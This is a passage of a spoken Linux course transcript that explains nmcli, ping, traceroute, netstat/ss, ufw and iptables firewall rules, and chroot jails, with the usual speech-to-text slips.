bit overwhelming we’re not talking about networking we’re not talking about Network Plus or at least not in this depth I just wanted you to have this just so you can kind of see what this particular output right here kind of represents and these are this is just a sample of what would happen when you run the IP route command so in summary even though though I have config is supposedly deprecated it remains a widely recognized tool for managing network interfaces on Unix Bas systems it allows you to view the interface so on and so forth uh very similar to what is done with IP next on our list of tools is the network manager command line interface so NM CLI uh it’s a command line tool as the name implies uh and it helps you manage the network connections on Linux systems so it’ll interact with the network manager um which is a system service for managing the interfaces and the connections to the interfaces uh it’s commonly used in desktop environments and provides a convenient way to configure and control network settings without a graphical interface because the name is implying this is a command line interface so nmcli interacts with your network manager and it helps you manage the interfaces as well as the connections and so on and so forth uh these are some of the commands so if you want to look at the Active connections on your particular Network you just type in nmcli connection show and it’ll show you all of the Active network connections on your system and then it’ll show you the uu IDs for them the connection name type of the connection device associated with each connection so on and so forth and then you have the particular output as an example here so if we do the show this is typically what it looks like you have the name so this would be the interface right so this would be the machine itself this is the Wi-Fi uh router and then you have the uu ID for both of them and then you have ethernet for this guy and then you have Wi-Fi and then the device itself and then the device uh name or the device ID in this particular case so it’s going to be eth0 and then this is WLAN for this particular set of devices the set of network connections here so if you want to configure a static IP address using nmcli you would go through this now static IP addresses are IP addresses that don’t change so this is going to be a permanent IP address right so pseudo nmcli connection modify on this particular interface it’s going to be an ipv4 address and this is going to be the IP address that’s going to be assigned and it’s a subnet mask of 255 255 255 so it has three octets right the command assigns a static IP with a subnet mask of 24 to the network connection eth0 and this is our breakdown so we have pseudo we’re running it as a administrator nmcli connection modify is indicating that we’re modifying a network connection it’s going to be for this particular interface so this is the network connection that we’re going to to configure and then we’re going to have the IP address and subnet mask that we’re going to assign to it and we’re using an ipv4 uh version of the IP address and then we’re going to add it to this particular subnet which is the 24 so the 24 represents the the number of octets right so 24 divided 8 would be 3 which means 255.255 255 I’m just repeating a bunch of things that you should buy now know so if you want to enable or disable connections uh it’s very similar to everything else we’ve done so we are using the up and down keywords in this particular case we’re going to say sudo nmcli connection up for this particular interface or connection down for this particular interface and we’re going to bring the connection for that interface either up or down activate it or deactivate it and this is what that looks like right here so nmcli connection up eth and C connection down eth yada yada yada so if you want to view the status of the devices now you would look at the nmcli device status and it’ll display the status of all of your network devices whether or not they’re connected disconnected or unavailable and this would be what the example output for that look like so the device you can see right here so this would be the internet this is the Wi-Fi this is the loop back or the local uh host and then the ethernet is connected the Wi-Fi is connected and the loop Act is not being currently managed right so if you want to available it list available all the Wi-Fi networks that you have uh for your particular connection or for your particular device and this will probably be a really big list depending on how big your building is or who’s around you and then you’ll just do nmcl device Wi-Fi list and it’ll list all the available Wi-Fi networks like their ssids and the signal strength and security type and this is what that output potentially looks like so this is the SSID which is the the name essentially of the Wi-Fi so you have my Wi-Fi another Wi-Fi and then there’ll be AT&T y y y Spectrum y y y um the mode right and then the channel that it will be on the rate the speed of it the signal so if it has a signal of 70 it has a stronger signal and a stronger connection for what you have bars would be another version of looking at the signal and then you have the security which is WPA2 or WPA2 in this particular case but uh these are the Wi-Fi uh Securities the Wi-Fi encryptions and WPA 2 is one of the more common ones that are modern and most secure compared to all the the Legacy or outdated versions of wi-fi security if you want to connect to any of those networks you would run a pseudo command with nmcli and you want to connect to the device Wi-Fi and you want to connect to it and this would be the SS ID I guess that would be the name in this particular case and then the password would be password because most often than not you actually need the password to connect to a Wi-Fi and then it’ll just connect to that Wi-Fi using the provided SSID and password that you have given to it and this is the particular uh usage here so you will replace SSID with the actual name of the Wi-Fi and then you’ll replace password so in this particular example you’re connecting to this particular interface which would be for example my Wi-Fi in this case and then from there you will provide the password that would be inside of the password quotation and that will will be the actual password for that Wi-Fi network so in summary the nmcli provides a powerful command line interface for managing network connections on the Linux systems it allows you to view and modify connections assigning static IP addresses control connection States and of course manage the Wi-Fi networks so that is the power of NM CLI now on to troubleshooting so ping is a very useful utility um it’s used to test the reach ability of a host so a computer or server so you basically ping the IP address or you ping the website and you can also measure the round trip time for the messages that are sent to that to just uh establish how strong the connection is or how quick that particular host is uh to respond to you and when you send it you literally just say ping and then you give it the IP address and then what it does is it’ll send a bunch of Internet control message protocol packets so icmp packets anytime you see icmp think ping so it’ll send Internet Protocol packets and there’s something called the icmp flood and this is actually a way that you can uh do a dods uh attack or a Dos attack which is a denial of service attack by flooding that particular host with a bunch of requests with ping and because it’s getting so many requests you may take it down and it may go out of service so this is something that you can see regularly icmp will be associated with ping so just keep that in mind if you see icmp that means they’re trying to Ping it so it’ll send the request to the specified destination which is either the host name or the IP address of that host and then the receiving response will tell you whether or not that thing is up so typically if it doesn’t uh if it’s not up it’ll respond with some kind of a you know host is down or something similar to that if it is up it’ll just say connection was a established and the amount of time that it took for that connection to get established the roundtrip time so the rtt is where the measurement of the time that it takes for the echo packet to actually go to the host and reply back to you so it’s the round trip very very simpler uh very simple to understand um packet loss is the number of packets that were sent but then they got lost somewhere in the process right so the network connection or other issues so if it sends a packet and it didn’t come back or if it sends a packet and it wasn’t received it was lost in the process in the in the transition um in the transport so to speak um if that happens it’ll also report that back to you and this will help you understand the the strength of the signal to that particular host and how reliable that signal is the basic usage looks like this so you just say ping the host name or the IP address so ping google.com that’s an example and or ping you know one 5 whatever I’m just coming up with some kind of IP address but you basically just put in ping and end either the host name or the IP address itself and it’ll ping it for you just to tell you whether or not it’s up for the most part the reason why we use ping is just to see whether or not that host is actually up and when it is up this is what the result looks like so it will just say 64 bytes from this particular location was sent and being that actual host right the host IP address there were 64 bytes that was was sent back to you and this is the the response time which was 12.3 milliseconds and the next one was 11.8 12.1 but essentially this is exactly what it looks like when a host is up when it’s not up you don’t see anything like this it will typically just say uh connection was not available or host is down something along those lines but if you see this and then if you just see this every uh second or every one or two seconds and it just keeps coming cuz uh typically what happens is that unless you stop it so you would have to do uh control C which is actually I think on the next slide so we have the the breakdown here for what we just saw so we have the 64 bytes from the IP address which was the reply that we received from that IP address which was Google in this case uh the sequence of the packet so it starts at zero and it’ll just increment by one and then we have the TTL the time to live value indicating that the maximum number of hops that the packet can take before being discarded and then you have the actual time this is the roundtrip time for that packet to be received and so if you want to stop it right you would do control C which cancels that request unless you actually say that you wanted to send out 10 packets for example or five packets just to make sure that it’s up which is I think would be done with the dash C for count and then you would do that so that it’ll run and then after 10 packets it’ll stop running but if you just do pay Google by itself it’ll keep running until you stop it and you would have to do that with contrl C additional options oh there we go this is the count right here so- C is the actual count I I just keep getting ahead of myself so specifying the number of packets that you want to send and then after five packets it’ll stop pinging and then you can also set the interval between the packets to be sent and that you would do that with the I option and it’ll be a two it’ll be the number of seconds that it’s going to wait so if you don’t want it to show up on their on their intrusion detection system that you’re pinging them and if you want the Ping to wait you know 5 seconds or 10 seconds you can do that just to make sure that you still have the connection and it’s a live connection but it won’t show up on their IDs or their Network intrusion detection system as somebody’s massively pinging us and trying to see whether or not we are up whether or not we have service um you have some additional options here so we were talking about flooding right so if you wanted to flood this particular case um what happens is that you you are trying to potentially uh do a denial of service attack so if you do an F option so if you do the dash F option it’ll flood meaning it’ll send as many packets as fast as it possibly can and that you know the milliseconds that you saw will be much much smaller so it’ll be a massive flood of packets that will be sent to google.com and in this particular case I mean I don’t think Google will even care um but this is typically done to to slow down the actual host that you trying to reach because you want you want to either test their ability to handle a flood of traffic or you want to actually do a denial of service attack and stop them from operating in summary the Ping command is a vital Network troubleshooting tool because it actually tests the connection between devices and makes sure that the device is actually up it also tests the amount of time that it takes for packet to go back and forth to see how reliable that connection is and if you have any kind of a network issue it’ll provide information to you about packets that were lost in the process the length of time that is taking for the package to be sent and come back and of course if there is a status of the connection meaning if the connection is actually up and whether or not you can send a ping to it and receive something back trace route is the type of tool that helps you uh track the route that some a piece of traffic is taking or a packet is taking to go to a particular location so when you run it it’ll send a series of packets to whatever the destination IP address is and it’ll gradually increase the time to live values and that what that does is that it determines the maximum number of hops or the number of internet routers that the packet can Traverse right so when you send something out it’ll go through multiple Wi-Fi routers or multiple uh internet routers before it actually lands at its particular location and it’s rarely ever the same number of hops so um it could be you one hop it could be 10 hops right it just depends um when you increment the TTL value uh it’ll start at one and then it’ll travel only to the first hop before it gets discarded and then with each packet that goes after the fact the TTL value is going to be incremented by one so meaning it’ll take two hops on the second run before it gets discarded and then it’ll take three hops on the third run before it gets discarded and the number of hops again will be the connection to the routers the connection to the the destinations at the the kind of the intermediary connections before it actually lands at its final destination um it’ll send icmp packets icmp messages so when it the packet is discarded due to the expiration of the TTL it’ll handle the packet sent as an IP icmp which will give you the I the time exceeded message back to you as the source so it’ll include information about the actual router that I was trying to connect to allowing trace route to identify the Hop that did not make it the Hop that was discarded along the way and then when it completes the path it’ll keep going right so the process itself will continue until it actually reaches the destination and completes its path and it’ll tell tell you what the maximum number of hops that it took to actually get there um when you get the information from each hop trace route will actually construct the route that was taken by the packets and this is for again to try to measure connectivity and to try to measure the strength of a network and the strength of your particular host trying to connect to another host the strength of the internet connection that you have and the routers that you have and how long it’ll take for something to get through if something has been discarded along the way that is something that you think about if there are too many packets that have been discarded along the way that’s something that that again is kind of like a a red flag that it’s like okay we need to troubleshoot this connection because for whatever reason we’re dropping a lot of packets a lot of packets are being discarded and if it the paths are completed then trace route will actually record that information for you and it’ll show you how many of your uh pings that were sent out how many of the packets that were sent out were actually reaching its destination um if you want to run it it’s very similar to running the Ping command so you just do traceroute google.com for uh this particular example or you could say trace route and IP address.com and it’ll start sending packets out and it’ll start tracking the number of hops that it takes and whether or not those things are going to be discarded and the connection is actually being established or whether or not those things are going to reach the Final Destination that you want it to take and then when it does it’ll show you the route that it took and how many hops that it had to take in order for it to get to that particular destination so when you run it this is the kind of output that you’re going to see right so the very first one is the very first packet that was sent so this is the TTL right and so it went and it took a millisecond and then the second attempt it took 789 milliseconds and the third attempt it took 699 and then it’ll send two and then in this particular case 1.62 milliseconds and it incremented uh it was a longer time obviously because it’s sending longer packets the third one it it sends three right and then obviously the time in response is going to be longer because more packets are being sent out right and so this is what that actually means so this is kind of the breakdown of what we just saw so the very first one that we saw the IP address that we see at the beginning that’s the IP address of the first hop router and this is the first hop that it took the response time the round trip time for these three packets that perent to that first hop were the shortest that we got because it was a single packet right the lines after the fact were the IP addresses and roundtrip times for each of the Hops that we had along that particular path and if we wanted to let that keep running cuz that ultimately it’ll just keep running so this is in this particular case it took three Hops and it stopped running this what we can kind of assume but more often than not uh you’ll see a few dozen maybe it’ll be like 20 something hops that it’ll take and then the data points for each of the routers that it was connected to be before it finally landed at the location that you wanted it to land which is in this particular case the 142 250 74 etc etc this is the the IP address that the was the first hop that it took and then it got back to this particular guy and then this guy responded back to us in this particular case there was only three hops that were taken it went from us to them and it was only three hops HS which is very short to be brutally honest with you more often than not it doesn’t take only three hops to go from where we are to where this particular location was so it just traces the route that your particular Gateway took to get to the actual IP address of Google in this particular case right if you want to try to specify the maximum number of hops that you want the uh the trace route to take it’ll be the M option for Max um and you can give it the the number of hops that you want it to take before it gets to google.com um and then you can also M uh set the number of uh packet bytes the size of the packets that you can declare which can in this particular case be done with the dash P option right here so if you want to dedicate the maximum number of hops you would do it with- m if you want to dedicate the size of the packet you would do- p in summary we have the trace route command that’s a powerful tool to diagnose network connectivity issues by identifying the path that packets take to reach a destination it helps to pinpoint where the delays or failures are along the Route by looking at the actual time stamps and which packets were actually discarded and then it makes it very valuable for you to network uh to troubleshoot your network connections because you will see where how many packets were dropped what uh was taking the longest amount of time to get to a location and the specific routers that were responsible for those network uh connection drops or the delays in the connection net stat short for the network statistics is another command line tool that’ll Display Network related information like the actual connections that you have the routing tables the interface statistics masquerade connections this a really fun word and multicast memberships it’s used very regularly for monitoring and troubleshooting network issues and the basic usage would be to run it with a variety of flags so if you want to view the active listening ports using netstat you can run it with these various flags that you have right here so T would be TCP ports and TCP connections U would be UDP ports and UTP connections L would be only the ports that are in listening mode and then n would be the numerical addresses instead of of the host name so you would get the IP addresses instead of the host names in this particular case so if you just did T it’ll only show you TCP connections if you just did U it’ll only show UDP if you did if you didn’t include L it would show if it’s listening or not listening right so this is essentially looking for all of the connections TCP or UDP that are in listening mode and then you want to see the IP addresses for those particular connections so this is what the output potential would actually look like so you have the protocol which is TCP TCP 6 UDP udp6 so whether or not it’s TCP or UDP this would be right here received and send queries the local addresses that are assigned to them as well as the ports that are assigned to them so this is Port 22 this is Port 80 which is the HTTP server this is the secure shell server these two ports I don’t know actually it’s they are UDP ports we can understand that but I haven’t memorized what they would stand for or what service they would have stands for and then these are the foreign addresses if any and the state that they are in which would be listening state so the TCP ports on these particular addresses on our local addresses are actually in listen mode these UTP ports are not in listen mode SS is the socket statistics um which is the modern uh alternative to net stat so it’ll provide essentially similar information similar functionality but supposedly it has better performance and it has a more detailed output so it’s also part of the IP Route 2 Suite uh which was very similar to what we dealt with with IP itself and it’s preferred in a lot of Linux uh distributions and you run it like this so very similar to what we just did right so you just do instead of net stat you would do SS and then you would give it the flags that you want it to run and exactly the same that we had before we have the TCP UDP listening ports as well as the numerical addresses that would be resolved for them and this is what the output looks like so similar to what you saw previously except instead of the listen or uh unconnected uh state right now that we see here that was previously at the very end right here it’s at the very beginning right here it’ll give you the send number of packets that was sent to them the addresses and the ports that are connected or uh listening and then you have the pier address and ports that would be on the other side so uh this is the example output for the SS command the uh what is it called again the socket statistics command that we use um so to get some additional options here we can look at a established connections so these would be TCP connections show active established TCP connections this would be all TCP connections listening and established which is right here so you can again you can do singular uh Flags or options you can combine the flags and options um you can also look at process information so Tu TCP UDP give me the the network the so name uh resolution deny it so I just want to see the IP address I want to be in listening and and then I want to see the P ID the process ID and program name also as well when it comes down with this so you get the process information that would be connected or running in this particular case so we got everything we just added that last uh flag to it as well so that we can get the process information in summary we have both netstat and SS which are very powerful tools for monitoring and troubleshooting our network connections and they’ll give you a lot of great details whether or not it’s been connected if it’s in listening uh with the IP addresses so on and so forth netstat is technically older it’s very well known um SS is the modern version but they both offer essentially the same information that you’re looking for um I did like the output of ss a little bit better cuz it seemed a little bit more uh friendly to the eye but for the most part they give you the same information that you would need and finally we have arrived at our network uh fundamentals conclusion here which is going to be our firewall settings so so the ufw which is the uncomplicated firewall this is the most common it’s like the uh firewall management uh that is the simplest that it possibly can be via the command line so it’s straightforward and it creates and manages IP tables firewall rules and it’s particularly popular on Ubuntu and all of the derivatives because it’s simple and it’s very easy to use so this is just an example here if you want to enable the firewall you just do pseudo ufw enable and so it activates the firewall and it it enforces any and all of the configured rules that you have for this thing so once it’s actually been en enabled it’s going to start running and it’s going to filter any of the incoming or outgoing traffic based on whatever the rules that you have that’s been set up so if you want to disable it you would do the same thing pseudo ufw disable and it will just deactivate it and any of the traffic that you previously were filtering is now not going to be filtered anymore um if you want to allow a service so in this particular case SSH represents Port 22 so you do sudo ufw allow SSH so it allows traffic for that specific service which is in this particular case SSH which would be Port 22 and SSH stands for secure shell so it allows for somebody to connect remotely to the particular device that this ufw is running on um if you want to deny it you can do it via the port number as well as the service so you could say deny 80 which would be the HTTP traffic and in this particular case it’ll block HTTP traffic on Port 80 which prevents access to web services running on this particular Port then you have the status of the firewall so if you wanted to see what the current status of it is whether or not it’s actually running and what all of the active rules are so if there are any deny rules if there are any allow rules you can see all of those things by just running a simple status command on this and I’ll just show you which one of the rules that you just try to apply for example so if you apply a deny Port 80 or deny SSH if you did those things and you run a status you can check whether or not those things are actually active and currently running um you can do a port allowance in this particular case so similar to what we did with the the service right we can do the same thing with a port that’s associ with it and then you can say allow 443 which is https so this is for like the internet um and Port 80 is HTTP but https is just a secure version meaning it has TLS or SSL uh uh traffic so that it’s actually encrypting all of the communication with your browser and it would be a TCP traffic Port right so it’ll allow all of the 443 TCP traffic that is typically for the communications with browsers UDP traffic is usually for uh viewing video so if you don’t allow UDP or if you don’t specify that you want UDP or if you actually deny 443 UDP you may deny any kind of video viewing that may happen on that web browser but in this particular case we’re allowing Port 443 which is for web browsers secure web connections we want those things to be allowed and then we’re going to allow the TCP protocol associated with them um if you wanted to deny the UDP traffic of Port 25 which is used for the simple mail transfer protocol it’s typically used for mail um it would be done by just doing a simple deny command and then doing 25- UDP and it denies all the UDP traffic on that Port which is used for simple mail transfer for emailing basically that’s what port 25 has done uh it’s the emailing Port that is typically used on on our Network and then you can delete rules right so if you had previously pseudo ufw allow SSH and now you want to delete that rule you can just say delete allow SSH it’s very simple right it’s very intuitive the syntax is actually quite easy to use and then you can delete the deny rule in a very similar way as well so if we denied Port 80 traffic then we would just say delete that particular deny 80 Rule and that way now you have deleted that rule which means that now you’re allowing the port traffic uh the port 80 traffic right and then you have logging on so if you want to enable the logging that’s being done from the firewall which highly recommended that you log everything that happens with your firewall you would just enable the logging so you would say logging turned on and it’ll log all of the firewall events that are happening um and this I mean I I can’t imagine that you would run a firewall without actually collecting firewall Lo logs so it’s very important to have the logs of the traffic that’s being uh coming through and if people are trying to access your Port uh 22 for example your secure shell Port when you’ve done a deny access to that port and then you keep getting attempts to hack into your Port 22 or maybe you have allowed Port 22 traffic to come in and somebody’s trying to log into your Port 22 but they keep using the incorrect password to log in so you feel like you are now victim of a Brute Force attack against your Port 22 which is for remote connections and remote control so uh it’s very important to turn on logging and then you can of course disable logging by just doing logging off and now there’s a version that’s kind of an all encompassing rule which would be a blanket type of a rule which would be allow all incoming so it’s it’s actually not uh allow all incoming it’s just allow incoming but what it does is that it allows all of the incoming traffic to your particular uh Network or I would say in this particular case your your uh device your computer right so you want to say hey I want you to allow all of the incoming traffic which means anybody and anybody could try to communicate with your particular computer on any port that you have open which includes your Port 22 it includes your DNS server and it includes all of the other 65,000 ports that would be available if you want to deny all of the incoming traffic you could do the same thing except just use deny instead of allow and then it’ll deny any connection that’s supposed to come to your particular device this is kind of difficult to do because then you won’t be able to connect to the internet for example via Port 80 or via Port 443 you won’t be able to get any of the the responses from Google or from YouTube if you’re denying all of the incoming traffic so just keep this in mind it sounds like it might be a good idea but you can say deny all and then go and do um allow of spe specific ports because you want to access specific Services right so you can allow you can dedicate you know the port 80 allowance and dedicate the port 443 allowance and then deny everybody else right and in the same way that you would deny all incoming or allow all incoming you can do allow all outgoing traffic so any request that you make out to the world we want to make all of those requests allowed and then same thing deny all of the outgoing requests and this is something that maybe you don’t want uh people to be able to connect to the internet for example because they shouldn’t be able to connect to the internet all they need to do is just work on their local computer schools sometimes do this because they don’t want people to be able to connect to the internet and they just want somebody to just use the computer for their schoolwork so this is the type of stuff that they would put so you’re denying all of the outgoing traffic that’s going to come from that particular computer so in summary it’s a very simplified process of managing the firewall rules for traffic and you can have very intuitive commands like we just saw which would be enable or disable or allow or deny and then you can do it based on the service name like SSH or you could do it based on the port number like Port 22 which would be the same port for SSH so you could allow Port 22 you could allow Port 443 so on and so forth IP tables is another command line firewall utility that will allow admins to configure Network packet filtering and address translation and a lot more other things so it’s a little bit more complex version of the uh the uncomplicated firewall that we just went through uh it operates with the Linux kernel to provide detailed control over how packets are routed so the core tables in IP tables can be filter so this is one of the main ones so it filters packets right so you can handle all the incoming packets by input you can handle the packets that are routed through your device by forward and then you can handle all outgoing packets by using the output chain so you have the input chain the forward chain and then you have the output chain and these are all done through the filter and then you have the network address translation which is for masting and port forwarding so it it doesn’t show your actual IP address it’ll use a different type of IP address so that the world doesn’t see your actual IP address which is actually very useful for masquerading and essentially kind of disguising your IP address and then the chains would be pre- routing so altering the packets before actually routing them out post routing altering packets after routering them out and then you have output meaning altering all of the packets that are generated by your device itself and being sent out to the world and what it does is that it essentially changes the source IP address in this regard it’ll change the source IP address when it gets sent out to the world to whatever the masquerad the disguised IP address would be so that when the the if it’s ever uh you know intercepted or your traffic is sniffed by somebody they don’t see your actual Source IP address they see some other IP address that wouldn’t be used so they can’t particularly attack you uh you have mangle which is used for specialized packet alterations like changing the type of the service that’s being request for example uh you know SS or UDP or th TCP or something like that or marking of the packet so you can again pre-out the alteration so you can alter the incoming packets before it’s been actually routed you can alter the outgoing packets by using the output chain and then forward input or post routing would be available for other types of modifications as well and that’s what mangle does so if you want to look at what the current rules are you would just do the pseudo IP tables with a capital l flag and it’ll list all of the current rules for the filter table uh it shows the rules for the input forward and the output chains and so this is what the example output would look like this is a little bit uh it’s kind of one of the more shrunken uh displays that I have on my screen so hopefully you can see what I’m doing um you can also just zoom in a little bit uh on your screen but so we have the chain input here and the policy itself is to accept it and then we have the chain forward and the policy is to accept it and the chain output and the policy for that is to accept it and then it gives us what the destinations would be if there were any and then the they accept all in this particular case from anywhere to anywhere these are the particular rules so this is the this is the current uh display of what we it would look like if we just uh listed this with the IP tables command so this doesn’t necessarily mean much CU there isn’t very much um uh data that is reflecting on these exact rules that we have over here cuz the with the exception of this one right here there really aren’t any rules that’s it’s saying from anywhere to anywhere except everything that’s basically the rule that we have over here so the basic commands that we can run would be to allow the traffic so in this particular case we have it IP tables Das a and then input and then the protocol would be TCP and then the destination Port would be 22 and then the accept would be the rule so it adds a rule to the input chain that’ll allow TCP traffic on Port 22 which is used for SSH then you can have the explanation of this mofo right here so you have the- a input which appends the rule to the input chain you have the- ptcp which specifies the protocol as being the TCP protocol Dort would be the destination Port as 22 and remember this is an input rule so this is actually all of our incoming traffic and the J accept would would jump to accept the target allowing the actual traffic okay if you wanted to block something then you would just do the drop as the rule itself so everything else exactly stays the same so in this particular case they’re doing it on Port 80 but the final rule would be to drop the traffic that’s coming so in this particular case this is again input traffic so it’s incoming and it’s on Port the TCP Port Port 80 and the very last thing is the big piece right here that is the actual rule itself which is to drop the target blocking the traffic that comes through for Port 80 as the destination Port if you want to delete something you would do the Dash D which is the deleting of the input rule from the input chain right so in this particular case it’s the TCP protocol on Port 80 which is the drop rule so previous the same exact rule that we just actually added uh we are now deleting it by instead of appending which was the- a that we were doing we’re just deleting it from the input chain and everything else stays exactly the same so the rule was to drop all the traffic from Port 80 now we want to delete that rule so we can allow the traffic on Port 80 and so if you want to save a rule you need to save it to the configuration file that is stored inside of the Etsy directory and you would do that Etsy IP table so assuming that you have IP tables installed and then there’s the rules. V4 which is actual configuration file so you will take the everything that you just did and then you will do pseudo IP tables save and then you would forward that so you should remember what we did with this operator it sends this particular output and it sends it to this specific uh path this particular file that we have which is the rules. V4 for IP tables if you want to restore a rule that was deleted um you can then go ahead and pull it from the rules. V4 file that you just did and you’re restoring so this one was saving so you’re doing IP taable save and you’re sending it to that configuration file this one whoops wrong direction this one you’re using IP tables restore and you’re restoring it from the IP tables rules configuration file if you wanted to view a specific table you would just use the T which is uh for the table um the natat table which is our Network address translator table and then it’s going to list all of the rules for our net table so you would do IP tables again and then you just want to list the table so that’s what DT stands for and we want the network address translation table and we want to list all of the rules for that particular table so it’s a powerful flexible tool so obviously it’s a little bit more complex than what we just saw with ufw um it has a lot of rules that be that work for a lowlevel environment providing extensive control over the actual Network traffic handling um you can also configure the rules for filtering packets and translating Network addresses modifying packets so on and so forth so those are the features that are expanded upon that are not available in ufw so ufw doesn’t uh you know protect your IP address by changing the IP address on its way out which is the network address translation so ufw doesn’t do that right usw ufw doesn’t do the mangling that is available on IP table so it is a little bit more complex to work with but it also has a lot more functionality than ufw does all right now on to a very important chapter which is the security and access management chapter and the very first section of this is going to be on file system security the first portion of file system security is going to be CH root and the concept of the isolated environment and something called the chroot J so first chroot stands for changing root or change root um it’s a powerful Unix command and it changes the root directory for any current running process and its children processes so we’re talking about the parent process and its children processes um when you change the root directory uh effectively you’re isolating a subset of the file system and you create what’s known as the chroot jail that I uh that subsystem that isolated version of the subsystem um ensures that any uh process that’s running within it can’t access files outside of that specific isolated environment which means that it enhances the security and the control of that specific system as well as the directory or the file system that has been isolated so essentially what you’re doing is you’re taking one specific file system or let’s say one directory and all of the contents within that directory and what you’re doing is you’re isolating it so it’s separate from the rest of the file system hierarchy and then from there um you’re going to ensure that not only is the rest of the file system it protected from what goes on within that isolated environment but everything that’s inside of that isolated environment is also protected from what’s going on outside of it inside of the rest of the file system so essentially the isolation component from it just that specific isolation component guarantees security for the isolated environment as well as everything that’s sitting outside of that isolated environment a better way to break this down is to look at the question itself so why would we use this because when you isolate something when you isolate an application in a chroot jail which is that isolated directory and everything inside of it um what happens is that it limits the damage that any potential untrusted or compromised programs can do and vice versa uh because those untrusted programs can’t see or interact with the broader system right so uh I’m going to show you a visual of this real quick okay so here’s the example that we have the visual that we have so this is the standard hierarchy right here right so this is our actual system route as well as the binaries the home the system so on and so forth right and then inside of the home we have this one particular user who has all of their contents but what has happened is that we’ve done CH rude we’ve put all of their contents inside of a CH rude jail so to speak and we’ve imprisoned them and now what’s going on is that everything inside of this red box is completely separate from the rest of the system meaning if this particular user downloaded something that they shouldn’t have if they clicked on a link they shouldn’t have whatever they did in their particular environment is protected it’s isolated right it’s isolated from the rest of this environment meaning our actual root and the binaries and everything else that’s inside of our main system is not interact is not affected by what’s going on inside of this jailed portion and that’s really the the big significance here essentially we’ve created a Sandbox type of an environment which anything that happens for this user in their isolated environment it might affect their system I mean it probably will affect their file system they probably might lose the content since inside of that or the the hacker or somebody who got into their file system may have access to everything that’s going on inside of this isolated area but they won’t be able to leave this isolated area and go inside of this root portion which is very important because this user maybe they don’t have elevated Privileges and we don’t want them to uh if they do something wrong and if they get hacked if somebody exploits this particular user we don’t want that malicious attacker that malicious actor to be able to get out of this environment and actually go inside of the main environment that has root privileges and they can do some serious damage get access to certain materials that they otherwise would not have had access to so this is the whole con this is the visual concept of what it means to create a chroot jail there are also other reasons why chroot is actually useful so apart from security um if developers want to create something and test it in a controlled environment before deploying it into the production environment or deploying it to the rest of the company so to speak uh they can do that safely inside of a jailed or imprisoned type of an environment um they can test our applications and any configurations that they want um and really really testing out the software that um has different dependencies or libraries that it needs for uh upgraded versions so on and so forth so it’s actually very very useful in the development context as well and finally the uh access and repairing of the systems uh from a rescue environment meaning if something has happened in incident response and the main system is unbootable uh administrators can use CH rout to access and repair those systems from the rescue environment because uh something may have happened and there is a crash or some kind of a uh something that they need to recover from essentially so that they can go back to what’s known as business as usual so there’s a recovery point and usually they take those images every time that they do a backup where they would have hopefully frequent backups of the most recent recovery point and then administrators can actually use CH rude to be able to access the system itself from what is known as the rescue environment which is essentially a jailed environment a chro jailed environment and then they can hopefully recover the system so the use of this command uh first requires that you actually create a directory that will serve as the CH root jail so we’ve already covered how to make a directory so you would make a directory and you would need to use pseudo because you’re going to use this particular directory in an elevated privilege environment so that other people can’t interact with it without having pseudo access so you would create the directory using pseudo and then whatever the path of the directory is this is what we’re going to use as our actual jail environment and then you’re going to populate that jailed environment um by either copying or installing the necessary binaries libraries and files into that particular environment so you would create the environment and it could be what we saw from that visual example it could be something that belongs to a user and then you would populate the contents of that directory with the libraries the files and uh binaries everything else that would be necessary for that particular environment to run and this is the basic population of it that happens right so in this particular case They’re copying bin bash to that directory uh They’re copying uh recursively everything that’s inside of the library and Library 64 and everything that’s inside of the user all of that is going to be copied to the new directory that’s been made which is the jailed directory right the imprisoned direct I like saying imprisoned for whatever reason but so all of the contents of everything that needs to be used for that specific uh jailed environment it needs to actually be copied into that environment so it’s it’s this part is very very simple um the r command is a recursive command meaning it’s taking everything inside of the library as well as all of the subdirectories and the contents of those directories all of those things are going inside of the the jailed environment as well as all these other examples as well so what you want to do is ensure that the directory structure within the CH rout jail mimics the standard Linux directory layout uh essentially meaning that you would need the the binaries as well as the the system binaries all of those other things to be able to make sure that this actually works so ENT what ever you would need in a regular environment in a standard Linux directory layout whatever you would need in that standard layout for your particular environment you need to make sure that it also exists inside of this jailed environment because it is being isolated from the rest of the system once you’ve transferred everything inside of the jailed environment then you just use the CH root command to change the root directory for the current process to the specified directory so what you would do is just run pseudo CH route the path to the actual directory we’ve created and all of the contents inside of it right and so what that does is just changes the root directory for the current session to that particular directory meaning uh for when you’re logged in into the current session inside of that Linux machine once you’ve created this uh jailed environment and you put all the binaries and everything that you would need in order for it to run uh then you change the route to that particular directory and for the remaining session that you’re logged into it’s going to act as if this directory is your actual root directory and if you want to run anything and uh test any particular development upgrades or if you wanted to open up a a file attachment for example to see whether or not it runs properly or if it’s malicious or malware or anything like that you would do it inside of this particular directory to protect the rest of the system from it or or to test whatever you need to test uh without affecting the rest of the system and this is a full workflow flow from beginning to end so you have creating and populating their directory itself so you have the make directory and then this is going to be the name of the directory and then you’re going to copy everything that you need for that particular directory into it which is going to be uh in this case these are all the various options that it can possibly be so you’re going to have my CH root and then inside of my CH root you’re going to take the bin bash put it inside of the bin the lib is going to go inside of the root and then the other pieces the 64 version of it is going to go inside of the root as well and then you’re going to change the environment that you’re in to that particular environment right so you’re going to do CH root my chroot and then you’re going to run it and that’s it and then once you’re inside of the chroot environment you just want to make sure that everything is actually running as it should so you can run something like LS and the forward slash which means that you’re you’re trying to list the contents of that root environment so when you do the forward slash you’re essentially listing the contents of the root directory and if you have done everything correctly you should only see the contents of this new root environment uh instead of everything that you would normally see when you look inside of the root directory so it should technically only just be uh these pieces right here right cuz we copied all of these things so you should only see the bin and the lib and then lib 64 those should be the only things that you see once you run this LS command to see what’s inside of the root directory some considerations and best practices to keep in mind so you want to keep the uh chroot environment the jailed environment as minimal as possible M making sure that you only have the stuff that you actually need all the necessary binaries or libraries or software anything like that to just make sure that you’ve reduced the attack surface if you copy everything that’s inside of your normal environment inside of the jailed environment it’s kind of defeating the purpose of creating this isolated environment so you only want to use the things that you actually need for that exercise because again it’s only for that session anyway ways and once you’re done with that session you I mean you can reuse it it’s not like you can’t reuse it um but for that particular session you should just only be using the things that you actually need um make sure that all the file permissions within that Jail uh are set correctly to prevent any privileged escalation uh attempts and the Escape prevention to uh to make sure that the person if in case anybody has actually uh attacked that particular jail directory uh to make sure that they can’t escape essentially uh you want to avoid running any services or granting access to tools that can allow processes to escape the CH route jail which goes back to the very first point which means only include the necessary binary so you don’t want to give access to or you don’t want to copy any binaries inside of the jail that would potentially Grant the attacker uh an Escape Route right they don’t want to have a vector to get out of the jail and then get into the rest of your system in summary CH route is a very valuable tool 